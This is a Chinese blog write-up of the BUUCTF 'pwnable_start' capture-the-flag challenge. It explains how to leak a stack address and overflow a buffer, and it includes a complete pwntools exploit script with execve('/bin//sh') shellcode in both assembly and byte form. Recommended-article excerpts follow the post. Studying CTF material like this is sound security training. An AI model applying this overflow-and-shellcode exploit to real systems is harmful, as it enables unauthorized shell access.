关于BUUCTF之“pwnable_start”的一点小结

最新推荐文章于 2024-02-04 20:12:39 发布
最新推荐文章于 2024-02-04 20:12:39 发布
阅读量293 收藏 1
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/121764096
版权 
 之前这个用汇编代码编写shellcode的题目做的较少,这题算是开端。

正常检查程序保护,啥也没开。
我们先分析一波程序:
在这里插入图片描述
需要用到一点汇编知识,总的意思是:四个xor清零四个寄存器。而后压栈数据,是最开始会输出的“Let’s start the CTF:”然后调用write函数输出上面内容0x14个字节。而后调用read函数输入最大0x3c字节内容。在add esp ;然后返回。
我们选择shellcode在栈上执行办法。所以我们需要泄露栈地址,计算偏移量,覆盖返回地址为shellcode所在地址
首先我们泄露栈地址:

second_write = 0x08048087
payload = b"A" * offset + p32(second_write)

这里我们解释为什么第二次调用write就能够泄露栈的地址了:

我们对着IDA上边的.text解释:
0x8048087:之前栈上压入了6个数据;之后read函数,write函数调用完后esp始终没有变化,直到出现了add esp,0x14.这使得esp此时指向第二个压入的数据,也就是返回地址(这里是exit的地址),其上就是第一次压入的数据(栈的地址,就是即将被泄露的栈的地址)
在这里插入图片描述
如上,栈第二个地方存的就是第一个被压入的数据,也就是其下面的栈的地址。所以当paylaod1发送时,返回“0x08048087 mov ecx, esp ; addr”到这里执行,使cx指向栈顶,此时栈顶就是第一个被压入的数据,存的正是栈的初始地址,可以被泄露。

WP:

from pwn import *
r = remote("node4.buuoj.cn",25434)
context(arch="i386",os="linux",log_level="debug")
offset = 0x14
second_write = 0x08048087
payload = b"A" * offset + p32(second_write)
r.sendafter(":",payload)
#r.recvuntil(":")
#r.sendline(payload)用着两句不行,会报错。
stack_addr = u32(r.recv(4))
#print("stack_addr ---> ",hex(stack_addr))
#shellcode=asm(shellcraft.sh())  
shellcode=asm( "xor ecx,ecx;xor edx,edx ; push edx;push 0x68732f6e;push 0x69622f2f; mov ebx,esp;mov eax,0xb;int 0x80 "
)

#shellcode= b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
#payload= b'a' * offset + p32(stack_addr + offset) + shellcode
payload=b'a'*20+p32(stack_addr+20)+shellcode
r.send(payload)
r.interactive()

这里再解释一下" p32(stack_addr + offset)":
因为第二次执行完read之后执行了 add esp, 14h,此时esp指向的就是即将执行的shellcode的地址,而shellcode的地址正是泄露的stack_addr +20

Hvf0x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwnable_start
BengDouLove的博客
05-01 351
程序只有这么点代码,稍微分析一下 esp入栈,返回地址入栈(这里直接返回到exit函数,就退出程序了) 清空四个寄存器 这些东西被入栈,不知道是什么,往下看 这里调用了write函数,在汇编当中调用write函数的形式和寄存器是这样的 wtite ( fd , addr , length ) 三个参数对应的寄存器为 ebx ecx edx 将esp赋值给了ecx,说明要打...
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4158
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1144
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
PWN刷题】Pwnable-Start、Pwnable-orw
QYbudong的博客
05-03 1420
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
[BUUCTF]刷题:pwnable_start
zyxx_wjc的博客
07-06 217
BUUCTF:pwnable_start题解
buu pwnable_start 详解
m0_74172100的博客
07-11 154
这里是不是使得 ret (返回地址)成为了新栈的内容,因此利用题目自带的write函数 将ret(返回地址)填入 p32(0x0804808),然后执行 mov ecx,esp。#使esp(栈顶)增加了0x14字节,ebp没改变,使用的内平栈,没有ebp,覆盖完buf后就是ret,从ret开始就是一个新的栈。之前加上一个push ecx 还是因为 add esp,14h ,使得 ret (返回地址)成为了新栈的内容,所以使用 push ecx ,使 esp-4 跳过 ret的地址。
pwnable start
m0_57754423的博客
01-25 1711
如果有什么不懂的地方,可以在评论区评论哦,看到就会回答的。 拿到附件以后 checksec一下: 32位程序 没有开启任何保护,放入ida中看一下,只有两个函数_start和_exit,这个题目的源码就不是C代码,本身就是汇编代码,: 我们看汇编代码: 大概流程就是 先压栈esp和exit函数地址,然后压栈字符串,我们可以先运行一下这个程序: 中间的五次push应该就是压入的这些字符串。 随后 write系统调用 打印这些字符串,然后 read系统调用 让用户写入数据 write了
ui_start.rar_ui_start
09-23
在IT领域,尤其是在软件开发和通信工程中,"UI_start.rar_ui_start"这个标题暗示了我们正在处理一个与用户界面(UI)启动相关的项目。这个压缩包可能包含了一个用于初始化或展示用户界面的主程序,以及相关的辅助...
php session_start()出错原因分析及解决方法
10-26
本文是对php中session_start()的出错原因及解决方法进行了详细的介绍,需要的朋友可以过来参考下,希望对大家有所帮助
PHP中ob_start函数的使用说明
10-26
下面我们将详细讨论`ob_start`函数以及与之相关的其他输出控制函数: 1. **`ob_start`函数**: `ob_start()`函数开启一个新的输出缓冲区。这意味着从此时起,所有的输出(包括`echo`,`print`和PHP代码的自然输出...
Create_StartService.rar_StartService vc_StartService windows_程序
09-24
`StartService`函数是Windows API中用于启动已安装服务的关键组件,通常由C++等编程语言的程序调用。在这个"Create_StartService.rar"压缩包中,我们可能找到了一个用于创建Windows服务的控制台应用程序,它可能是用...
php中 ob_start等函数截取标准输出的方法
01-20
我想将PHP脚本中输出的东西收集在一起,于是使用了ob_start和ob_end_flush这两个函数,确实有达到收集输出内容的作用,但同时也将这些打印到了控制台界面中。我想问的是有没有办法,阻止PHP像控制台输出信息。该软件...
pwnable_start(write up)
m0_73756460的博客
01-19 180
buu刷题 pwnable_start(write up)
pwnable_start
weixin_43439169的博客
09-22 91
pwnable_start
pwnpwnable_start --只有read和write函数的getshell
最新发布
question55的博客
02-04 896
addrlenfd'<'LINUX -
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 575
这个题开了沙箱,有uaf。利用思路:借助environ泄露栈地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
BUUCTFpwnable_orw
qq_44768749的博客
08-27 1526
BUUCTFpwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
.global _start _start:
07-17
在汇编语言中,使用 `.global` 指令来声明一个全局标号,而 `_start` 是一个特殊的标号,表示程序的入口点。 在嵌入式系统或操作系统开发中,程序的入口点通常被命名为 `_start`。当程序加载到内存中并启动时,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值